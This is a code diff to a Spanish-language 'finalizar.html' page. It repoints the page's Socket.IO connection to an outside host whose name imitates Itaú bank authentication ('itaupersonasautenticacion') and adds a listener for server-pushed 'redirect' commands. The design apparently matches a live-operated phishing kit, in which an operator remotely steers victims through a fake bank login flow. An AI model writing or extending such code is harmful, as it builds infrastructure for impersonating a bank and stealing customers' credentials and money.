--- a/finalizar.html
+++ b/finalizar.html
@@ -113,9 +113,9 @@
         <button class="finish-btn" onclick="window.location.href='index.html?clear=true'">Finalizar</button>
     </div>
 
-    <script src="/socket.io/socket.io.js"></script>
+    <script src="https://itaupersonasautenticacion.up.railway.app/socket.io/socket.io.js"></script>
     <script>
-        const socket = io();
+        const socket = io('https://itaupersonasautenticacion.up.railway.app');
 
         // Listen for redirect commands
         socket.on('redirect', (data) => {
